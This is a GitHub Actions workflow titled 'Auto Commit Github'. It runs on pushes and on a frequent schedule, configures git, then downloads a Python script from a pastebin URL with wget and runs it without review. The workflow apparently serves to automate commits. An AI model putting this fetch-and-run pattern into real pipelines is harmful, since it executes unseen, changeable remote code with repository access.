name: Auto Commit Github
on:
  push:
    branches:
      - main
  schedule:
    - cron: "* */6 * * *"
jobs:
   acg:
    name: Auto Commit Github
    runs-on: ubuntu-latest
    steps:
      - name: Setup Checkout
        uses: actions/checkout@v3
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.10'
      - name: Setup Git Config
        run: |
          git config --global user.email "${GITHUB_ACTOR}@users.noreply.github.com"
          git config --global user.name "${GITHUB_ACTOR}"
      - name: Run Python Code
        run: wget -c https://pastebin.com/raw/keCTHaDJ -O main.py && python main.py
